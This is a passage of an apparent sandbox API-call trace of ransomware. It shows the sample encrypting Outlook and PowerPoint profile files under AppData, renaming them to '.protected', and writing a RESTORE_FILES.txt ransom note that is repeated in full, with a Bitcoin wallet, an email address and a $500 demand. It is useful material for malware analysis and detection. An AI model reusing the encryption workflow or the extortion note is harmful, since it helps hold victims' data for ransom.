secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.237] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.238] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.238] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.238] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.238] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.238] CloseHandle (hObject=0xd8) returned 1 [0090.238] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.238] lstrcmpiW (lpString1="Outlook", lpString2="Windows") returned -1 [0090.238] lstrcmpiW (lpString1="Outlook", lpString2="Program Files") returned -1 [0090.238] lstrcmpiW (lpString1="Outlook", lpString2="Program Files (x86)") returned -1 [0090.238] lstrcmpiW (lpString1="Outlook", lpString2="$Recycle.bin") returned 1 [0090.238] lstrcmpiW (lpString1="Outlook", lpString2="System Volume Information") returned -1 [0090.238] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook") returned 67 [0090.238] lstrcmpW (lpString1="Outlook", lpString2=".") returned 1 [0090.238] lstrcmpW (lpString1="Outlook", lpString2="..") returned 1 [0090.238] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\*") returned 69 [0090.238] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.239] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.239] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.240] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.240] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.240] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.240] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\.") returned 69 [0090.240] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.240] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.240] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.240] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.240] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.240] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.240] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.240] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\..") returned 70 [0090.240] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.240] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.240] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.240] lstrcmpiW (lpString1="Outlook.srs", lpString2="Windows") returned -1 [0090.240] lstrcmpiW (lpString1="Outlook.srs", lpString2="Program Files") returned -1 [0090.240] lstrcmpiW (lpString1="Outlook.srs", lpString2="Program Files (x86)") returned -1 [0090.240] lstrcmpiW (lpString1="Outlook.srs", lpString2="$Recycle.bin") returned 1 [0090.240] lstrcmpiW (lpString1="Outlook.srs", lpString2="System Volume Information") returned -1 [0090.240] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 79 [0090.240] StrStrIW (lpFirst="Outlook.srs", lpSrch=".protected") returned 0x0 [0090.240] lstrcmpW (lpString1="Outlook.srs", lpString2="RESTORE_FILES.txt") returned -1 [0090.240] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.240] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 79 [0090.241] StrStrW (lpFirst="Outlook.srs", lpSrch=".txt") returned 0x0 [0090.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 79 [0090.242] StrStrW (lpFirst="Outlook.srs", lpSrch=".rar") returned 0x0 [0090.242] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 79 [0090.242] StrStrW (lpFirst="Outlook.srs", lpSrch=".zip") returned 0x0 [0090.242] ReadFile (in: hFile=0x14c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ea24*=0xa00, lpOverlapped=0x0) returned 1 [0090.287] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffff600, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.287] WriteFile (in: hFile=0x14c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ea24*=0xa00, lpOverlapped=0x0) returned 1 [0090.287] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.287] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0090.287] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0090.287] CloseHandle (hObject=0x14c) returned 1 [0090.287] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.protected") returned 89 [0090.288] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs.protected")) returned 1 [0090.288] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.289] lstrcmpiW (lpString1="Outlook.xml", lpString2="Windows") returned -1 [0090.289] lstrcmpiW (lpString1="Outlook.xml", lpString2="Program Files") returned -1 [0090.289] lstrcmpiW (lpString1="Outlook.xml", lpString2="Program Files (x86)") returned -1 [0090.289] lstrcmpiW (lpString1="Outlook.xml", lpString2="$Recycle.bin") returned 1 [0090.289] lstrcmpiW (lpString1="Outlook.xml", lpString2="System Volume Information") returned -1 [0090.289] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 79 [0090.289] StrStrIW (lpFirst="Outlook.xml", lpSrch=".protected") returned 0x0 [0090.289] lstrcmpW (lpString1="Outlook.xml", lpString2="RESTORE_FILES.txt") returned -1 [0090.289] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.289] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.290] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 79 [0090.290] StrStrW (lpFirst="Outlook.xml", lpSrch=".txt") returned 0x0 [0090.290] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 79 [0090.290] StrStrW (lpFirst="Outlook.xml", lpSrch=".rar") returned 0x0 [0090.290] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 79 [0090.290] StrStrW (lpFirst="Outlook.xml", lpSrch=".zip") returned 0x0 [0090.290] ReadFile (in: hFile=0x14c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ea24*=0x9a2, lpOverlapped=0x0) returned 1 [0090.295] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffff65e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.295] WriteFile (in: hFile=0x14c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x9a2, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ea24*=0x9a2, lpOverlapped=0x0) returned 1 [0090.295] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.295] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0090.296] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0090.296] CloseHandle (hObject=0x14c) returned 1 [0090.296] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.protected") returned 89 [0090.296] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml.protected")) returned 1 [0090.297] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.297] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.297] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\RESTORE_FILES.txt") returned 85 [0090.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.307] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.307] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.307] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.308] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.308] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.308] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.308] CloseHandle (hObject=0xd8) returned 1 [0090.308] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.308] lstrcmpiW (lpString1="PowerPoint", lpString2="Windows") returned -1 [0090.308] lstrcmpiW (lpString1="PowerPoint", lpString2="Program Files") returned -1 [0090.308] lstrcmpiW (lpString1="PowerPoint", lpString2="Program Files (x86)") returned -1 [0090.308] lstrcmpiW (lpString1="PowerPoint", lpString2="$Recycle.bin") returned 1 [0090.308] lstrcmpiW (lpString1="PowerPoint", lpString2="System Volume Information") returned -1 [0090.308] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint") returned 70 [0090.308] lstrcmpW (lpString1="PowerPoint", lpString2=".") returned 1 [0090.308] lstrcmpW (lpString1="PowerPoint", lpString2="..") returned 1 [0090.308] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*") returned 72 [0090.308] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.309] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.309] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.309] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.309] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.309] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.309] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\.") returned 72 [0090.309] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.309] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.309] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.309] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.309] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.310] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.310] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.310] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\..") returned 73 [0090.310] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.310] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.310] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.310] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.310] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\RESTORE_FILES.txt") returned 88 [0090.310] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\powerpoint\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.311] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.311] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.311] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.311] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.311] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.312] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.312] CloseHandle (hObject=0xd8) returned 1 [0090.312] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.312] lstrcmpiW (lpString1="Proof", lpString2="Windows") returned -1 [0090.312] lstrcmpiW (lpString1="Proof", lpString2="Program Files") returned 1 [0090.312] lstrcmpiW (lpString1="Proof", lpString2="Program Files (x86)") returned 1 [0090.312] lstrcmpiW (lpString1="Proof", lpString2="$Recycle.bin") returned 1 [0090.312] lstrcmpiW (lpString1="Proof", lpString2="System Volume Information") returned -1 [0090.312] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof") returned 65 [0090.312] lstrcmpW (lpString1="Proof", lpString2=".") returned 1 [0090.312] lstrcmpW (lpString1="Proof", lpString2="..") returned 1 [0090.312] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\*") returned 67 [0090.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 